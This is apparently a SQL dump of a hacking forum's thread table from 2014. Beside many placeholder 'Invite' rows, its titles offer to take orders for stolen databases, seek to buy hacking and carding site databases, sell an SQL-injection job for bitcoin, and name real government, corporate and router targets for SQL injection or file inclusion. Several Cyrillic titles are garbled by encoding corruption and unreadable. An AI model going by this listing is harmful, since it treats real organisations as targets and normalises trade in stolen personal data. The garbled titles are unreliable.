(1529, '{$name}', '', 1713, 1713, 1408519987, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519987, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1518, 'принимаю заказы на слив бд', '', 1701, 1701, 1408500220, 7, 0, 1, 0, 0, 0, 'opium', 24, 'opium', 1408500220, 109, 4, '', 1, 1, 0, 0, 0, '', 'ò÷ûþü, ò÷ûþü ýð ÷ðúð÷, ÿðртýõрÑÂтòþ, хõú'),
(1528, '{$name}', '', 1712, 1712, 1408519981, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519981, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1527, '{$name}', '', 1711, 1711, 1408519970, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519970, 4, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1526, '{$name}', '', 1710, 1710, 1408519960, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519960, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1525, '{$name}', '', 1709, 1709, 1408519942, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408519942, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1524, '{$name}', '', 1708, 1708, 1408516070, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408516070, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1531, '{$name}', '', 1715, 1715, 1408520005, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408520005, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1532, '{$name}', '', 1716, 1716, 1408521565, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408521565, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1533, '{$name}', '', 1717, 1717, 1408522520, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408522520, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1534, '{$name}', '', 1718, 1718, 1408523662, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408523662, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1535, '{$name}', '', 1719, 1719, 1408523768, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408523768, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1536, '{$name}', '', 1720, 1720, 1408524427, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408524427, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1537, '{$name}', '', 1721, 1721, 1408531215, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408531215, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1538, 'SQL - Injection HELP', '', 1724, 1724, 1408535071, 7, 0, 1, 0, 0, 0, 'lumbricus', 39, 'lumbricus', 1408535071, 29, 0, '', 1, 0, 0, 0, 0, '', 'advanced sql'),
(1539, '{$name}', '', 1725, 1725, 1408537312, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408537312, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1540, 'Buying [Hacking/Carding/Exploit] Related Forum/Site Databases', '', 1726, 1726, 1408547249, 7, 0, 1, 0, 0, 0, 'ropertus', 33, 'ropertus', 1408547249, 164, 0, '', 1, 1, 0, 0, 0, '', NULL),
(1541, '{$name}', '', 1727, 1727, 1408553209, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408553209, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1542, '{$name}', '', 1730, 1730, 1408560598, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408560598, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1543, '{$name}', '', 1732, 1732, 1408604486, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408604486, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1544, '{$name}', '', 1733, 1733, 1408604678, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408604678, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1545, '{$name}', '', 1734, 1734, 1408611665, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408611665, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1546, '{$name}', '', 1735, 1735, 1408612146, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408612146, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1547, '{$name}', '', 1736, 1736, 1408613470, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408613470, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1548, '{$name}', '', 1738, 1738, 1408623446, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408623446, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1549, '{$name}', '', 1739, 1739, 1408627221, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408627221, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1550, '{$name}', '', 1741, 1741, 1408630707, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408630707, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1551, '{$name}', '', 1742, 1742, 1408633599, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408633599, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1552, '{$name}', '', 1743, 1743, 1408666908, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408666908, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1553, '{$name}', '', 1744, 1744, 1408682381, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408682381, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1554, '{$name}', '', 1748, 1748, 1408701894, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408701894, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1555, '{$name}', '', 1749, 1749, 1408701895, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408701895, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1556, '{$name}', '', 1750, 1750, 1408701897, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408701897, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1557, '{$name}', '', 1751, 1751, 1408709496, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408709496, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1558, '{$name}', '', 1752, 1752, 1408713612, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408713612, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1559, '{$name}', '', 1753, 1753, 1408718412, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408718412, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1572, '{$name}', '', 1777, 1777, 1408901327, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408901327, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1560, 'ßþüþóøтõ ýðùтø чøтðûúу фðùûþò ôûѠblind sqli', '', 1755, 1763, 1408802161, 7, 0, 1, 2, 0, 0, 'Psych0tr1a', 11, 'w0rm', 1408737328, 36, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1561, '{$name}', '', 1757, 1757, 1408756163, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408756163, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1562, '{$name}', '', 1759, 1759, 1408772622, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408772622, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1563, '{$name}', '', 1760, 1760, 1408772650, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408772650, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1564, '{$name}', '', 1761, 1761, 1408791716, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408791716, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1565, '{$name}', '', 1765, 1765, 1408808934, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408808934, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1566, '{$name}', '', 1766, 1766, 1408811106, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408811106, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1567, '{$name}', '', 1767, 1767, 1408811108, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408811108, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1568, '{$name}', '', 1771, 1771, 1408835460, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408835460, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1569, '{$name}', '', 1772, 1772, 1408843441, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408843441, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1570, '{$name}', '', 1773, 1773, 1408868753, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408868753, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1571, 'Random SQLi Website with Email password count', '', 1774, 1774, 1408885182, 7, 0, 1, 0, 0, 0, 'l3n0', 44, 'l3n0', 1408885182, 43, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1573, '{$name}', '', 1779, 1779, 1408903966, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408903966, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1574, '{$name}', '', 1782, 1782, 1408915135, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408915135, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1575, '{$name}', '', 1783, 1783, 1408917789, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408917789, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1576, '{$name}', '', 1784, 1784, 1408955827, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408955827, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1577, 'mystery.bigmir.net', '', 1785, 1790, 1408965405, 7, 0, 1, 1, 0, 0, 'Psych0tr1a', 11, '123', 1408957591, 48, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1578, '{$name}', '', 1786, 1786, 1408961591, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408961591, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1579, 'She.com', '', 1787, 1788, 1408963396, 7, 0, 1, 1, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1408963261, 41, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1580, 'ÃÂüð÷þý (ÿþôôþüõý)', '', 1789, 1795, 1408977683, 7, 0, 1, 3, 0, 0, 'Kingbeef', 3, '123', 1408965280, 45, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1581, '{$name}', '', 1792, 1792, 1408968672, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408968672, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1583, '{$name}', '', 1796, 1796, 1408977697, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408977697, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1582, '*.ca.gov Include', '', 1794, 1794, 1408977680, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1408977680, 43, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1584, '*.sp.gov.br include', '', 1797, 1803, 1408985385, 7, 0, 1, 5, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1408978380, 46, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1585, '{$name}', '', 1799, 1799, 1408980066, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408980066, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1586, '{$name}', '', 1804, 1804, 1408994451, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408994451, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1587, '{$name}', '', 1805, 1805, 1409010743, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409010743, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1588, '{$name}', '', 1806, 1806, 1409010744, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409010744, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1612, 'overpro.ru | Generic File Downloader', '', 1833, 1910, 1409852899, 7, 0, 1, 20, 0, 1, 'unlog', 45, 'unlog', 1409398034, 345, 0, '', 0, 0, 0, 0, 0, '', NULL),
(1589, '{$name}', '', 1808, 1808, 1409059095, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409059095, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1590, '{$name}', '', 1809, 1809, 1409082829, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409082829, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1591, '{$name}', '', 1810, 1810, 1409085977, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409085977, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1592, '{$name}', '', 1811, 1811, 1409150970, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409150970, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1593, '{$name}', '', 1812, 1812, 1409153560, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409153560, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1594, '{$name}', '', 1813, 1813, 1409158065, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409158065, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1595, '{$name}', '', 1814, 1814, 1409178713, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409178713, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1596, '{$name}', '', 1815, 1815, 1409178858, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409178858, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1597, '{$name}', '', 1816, 1816, 1409183280, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409183280, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1599, '{$name}', '', 1818, 1818, 1409207204, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409207204, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1600, '{$name}', '', 1819, 1819, 1409210319, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409210319, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1601, '{$name}', '', 1820, 1820, 1409229962, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409229962, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1602, '{$name}', '', 1821, 1821, 1409232838, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409232838, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1603, '{$name}', '', 1822, 1822, 1409246651, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409246651, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1604, '{$name}', '', 1823, 1823, 1409254700, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409254700, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1605, '{$name}', '', 1824, 1824, 1409262943, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409262943, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1606, '{$name}', '', 1825, 1825, 1409266599, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409266599, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1607, '{$name}', '', 1826, 1826, 1409269650, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409269650, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1608, '{$name}', '', 1827, 1827, 1409279492, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409279492, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1609, '{$name}', '', 1828, 1828, 1409344961, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409344961, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1610, '{$name}', '', 1829, 1829, 1409359490, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409359490, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1611, '{$name}', '', 1830, 1830, 1409386404, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409386404, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1613, '{$name}', '', 1839, 1839, 1409425900, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409425900, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1614, '{$name}', '', 1840, 1840, 1409425953, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409425953, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1615, '{$name}', '', 1841, 1841, 1409428604, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409428604, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1616, 'ÿøшу òÑÂõü ò ûøчúу , ÿøшу...', '', 1848, 1884, 1409597851, 13, 0, 1, 2, 0, 0, 'Psych0tr1a', 11, 'w0rm', 1409503964, 59, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1617, '{$name}', '', 1849, 1849, 1409509093, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409509093, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1628, '{$name}', '', 1885, 1885, 1409604220, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409604220, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1618, '{$name}', '', 1852, 1852, 1409514764, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409514764, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1619, '{$name}', '', 1853, 1853, 1409514767, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409514767, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1620, '{$name}', '', 1854, 1854, 1409514868, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409514868, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1621, '{$name}', '', 1855, 1855, 1409516154, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409516154, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1623, '{$name}', '', 1863, 1863, 1409557547, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409557547, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1630, '{$name}', '', 1889, 1889, 1409631815, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409631815, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1624, 'шõûûы ýð .gov', '', 1867, 1876, 1409585892, 7, 0, 1, 4, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1409567924, 51, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1625, '{$name}', '', 1874, 1874, 1409585723, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409585723, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1626, '[MySQL]áÿþÑÂþñ þÿрõôõûõýøѠúþûûøчõÑÂтòð òыòþôøüых ÑÂтþñцþò ò 1 ÷ðÿрþÑÂ.', '', 1877, 1890, 1409666498, 7, 0, 0, 2, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1409586490, 35, 0, '', 2, 0, 0, 0, 0, '', NULL),
(1729, '{$name}', '', 2082, 2082, 1411012004, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411012004, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1629, '{$name}', '', 1886, 1886, 1409606276, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409606276, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1638, 'sql inj kontakten.dn.se', '', 1901, 1903, 1409760496, 7, 0, 1, 2, 0, 0, 'null', 9, 'null', 1409747318, 38, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1631, '{$name}', '', 1892, 1892, 1409680304, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409680304, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1632, '{$name}', '', 1893, 1893, 1409680306, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409680306, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1633, '{$name}', '', 1894, 1894, 1409680311, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409680311, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1634, '{$name}', '', 1895, 1895, 1409684278, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409684278, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1635, '{$name}', '', 1896, 1896, 1409693476, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409693476, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1636, '{$name}', '', 1897, 1897, 1409711516, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409711516, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1639, 'SQLi www.goccp.maryland.gov', '', 1905, 1905, 1409781988, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1409781988, 44, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1640, '{$name}', '', 1906, 1906, 1409785756, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409785756, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1641, '{$name}', '', 1907, 1907, 1409790949, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409790949, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1642, '{$name}', '', 1908, 1908, 1409816056, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409816056, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1643, '{$name}', '', 1909, 1909, 1409833231, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409833231, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1644, '{$name}', '', 1911, 1911, 1409865048, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409865048, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1645, 'ghanaweb.com', '', 1912, 1937, 1410009498, 7, 0, 1, 5, 0, 0, 'kx00', 6, '123', 1409909840, 93, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1646, '{$name}', '', 1916, 1916, 1409932765, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409932765, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1647, '{$name}', '', 1917, 1917, 1409932784, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409932784, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1648, 'Linksys Smart Wi-Fi Router EA6500', '', 1919, 2210, 1411933014, 9, 0, 1, 3, 0, 0, 'w0rm', 1, 'w0rm', 1409938637, 134, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1649, '{$name}', '', 1920, 1920, 1409939218, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409939218, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1651, '{$name}', '', 1925, 1925, 1409940382, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409940382, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1653, '{$name}', '', 1933, 1933, 1409954202, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409954202, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1654, '{$name}', '', 1934, 1934, 1409955345, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1409955345, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1655, '{$name}', '', 1936, 1936, 1410007333, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410007333, 5, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1656, '{$name}', '', 1938, 1938, 1410010209, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410010209, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1658, '*.apple.', '', 1942, 1965, 1410234541, 7, 0, 1, 3, 0, 0, 'w0rm', 1, 'null', 1410023769, 127, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1659, '{$name}', '', 1943, 1943, 1410025941, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410025941, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1660, '{$name}', '', 1944, 1944, 1410029704, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410029704, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1661, '{$name}', '', 1945, 1945, 1410036730, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410036730, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1818, '{$name}', '', 2212, 2212, 1411945374, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1411945374, 32, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1662, '{$name}', '', 1948, 1948, 1410055038, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410055038, 6, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1663, '{$name}', '', 1950, 1950, 1410060418, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410060418, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1664, '{$name}', '', 1951, 1951, 1410077195, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410077195, 7, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1665, '{$name}', '', 1952, 1952, 1410099913, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410099913, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1666, 'MVC -SQLi - 3 BTC', '', 1953, 1960, 1410209742, 7, 0, 1, 2, 0, 0, 'lumbricus', 39, 'ropertus', 1410165986, 67, 0, '', 1, 0, 0, 0, 0, '', 'advanced sqli'),
(1667, '{$name}', '', 1957, 1957, 1410185271, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410185271, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1668, '{$name}', '', 1959, 1959, 1410205047, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410205047, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1669, '{$name}', '', 1961, 1961, 1410209872, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410209872, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1670, '{$name}', '', 1962, 1962, 1410217869, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410217869, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1671, 'Sql velocityfrequentflyer.com', '', 1963, 1963, 1410233668, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1410233668, 30, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1672, 'enterprise-news.alcatel-lucent.com', '', 1964, 1964, 1410233808, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1410233808, 41, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1673, '{$name}', '', 1966, 1966, 1410246132, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410246132, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1675, '{$name}', '', 1968, 1968, 1410281798, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410281798, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1677, '{$name}', '', 1972, 1972, 1410343238, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410343238, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1678, '{$name}', '', 1973, 1973, 1410352098, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410352098, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1679, '{$name}', '', 1974, 1974, 1410358171, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410358171, 8, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1681, '{$name}', '', 1979, 1979, 1410383376, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410383376, 12, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1682, '{$name}', '', 1980, 1980, 1410387870, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410387870, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1696, '{$name}', '', 2013, 2013, 1410554211, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410554211, 9, 0, '', 1, 0, 0, 0, 0, '', NULL),
(1683, '{$name}', '', 1982, 1982, 1410397562, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1410397562, 10, 0, '', 1, 0, 0, 0, 0, '', NULL),
